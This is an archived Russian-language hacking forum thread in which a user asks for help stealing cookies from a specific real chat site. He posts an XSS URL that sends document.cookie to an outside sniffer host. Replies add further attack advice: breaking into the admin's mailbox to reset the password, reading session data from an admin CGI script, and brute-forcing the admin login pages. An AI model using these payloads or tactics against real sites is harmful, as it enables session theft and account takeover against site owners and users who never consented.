PDA

Просмотр полной версии : Что я делаю не так?

Illidan
29.01.2007, 18:40
Здравствуйте, я хочу украсть куки с чата (http://home.onego.ru/~smokie_chat/chat/), разобрался я вроде бы с XSS, со снифферами, нашёл на сайт ачата какой XSS используется в voodoo (?url=javascript:alert(/Tested%20by%20qBiN/);)
Сниффер использую http://xtoolz.hut1.ru/cgi-bin/x/xsave.gif
В итоге получилось у меня вот такая вещь http://home.onego.ru/~smokie_chat/chat/?url=javascript:document.location="http://xtoolz.hut1.ru/cgi-bin/x/xsave.gif"+document.cookie;
Но куки всё равно в логах не выдаёт((((
Что же я делаю не так?! И может ли это быть связано с тем, что сервер находится на провайдере onego.ru?
Или может я ошибку допускаю? :confused:
Illidan
29.01.2007, 21:33
Ну помогите пожалуйста, кто чем может.....
goodkit
29.01.2007, 23:14
А чё ето за чат-то?? ) Лучше бы подумал как chat.karelia.info паламадь!
Illidan
31.01.2007, 19:54
Помогите кто чем может....(((
ice1k
31.01.2007, 20:00
Ты где там xss то вообще нашёл ? ;) =)
Illidan
31.01.2007, 23:17
http://home.onego.ru/~smokie_chat/chat/go.php?url=javascript:alert()
Д-к вот он...алерт выскакивает, как и должно быть в XSS...или я не прав?
_Great_
31.01.2007, 23:22
лол. ну-ну
Kaban
31.01.2007, 23:42
у тебя наврят ли что-нить получится с xss.
ломай мыло админа и восстановливай пароль.
Illidan
01.02.2007, 00:26
Ок, но обьясните чё не так-то? Ведь в это статье написано мол в вудувских чатах это XSS http://forum.antichat.ru/thread20985.html
KREST
02.02.2007, 01:04
Проги найди и инфу про взломы почитай(Фак),мож с хss че и получиться....
Illidan
02.02.2007, 13:54
Д-к перечитал уже много чего (и не только на ачате), теории в голове много, а вот на практике жопа какая-то выходит((( Мож видео есть у кого по взлому вуду, или ссылки?
n3r0bi0m4n
21.02.2007, 02:24
VooDoo Engine, дабы такие "хитрые" личности как ты не 3,14здили куки делает вот что:

тыкая на каждую ссылку где-нибудь внутри чата, она загружается в переменную "url" скрипта go.php ИЗ КОТОРОГО уже перемещает на нужную страницу. Собственно ничего сильно интересного не передается :)

у мну вышли только: дизайн, имя юзера и еще какая-то чушь ... но я не особо старался, так что... пробуй и может получится что-нибудь...

кстати, если чат на демоне - лезь в /cgi-bin/daemon_admin.pl (если его не переименовали)

там все сесси пользователей (втч и админов) но ничего сверхполезного это ТОЖЕ не даст.

тебе как минимум нужен пасс от site/chat/admin/

вооо-оот там уже можно что-нибудь накосячить...
пиши брут для admin/index.php || admin/configure.php

зы: сырцы на vochat.com
DRON-ANARCHY
23.02.2007, 00:16
в ентом go.php вырезается такая выжная хрень как %22
без нее даже алерт не выскочит, т.к. все останется в теге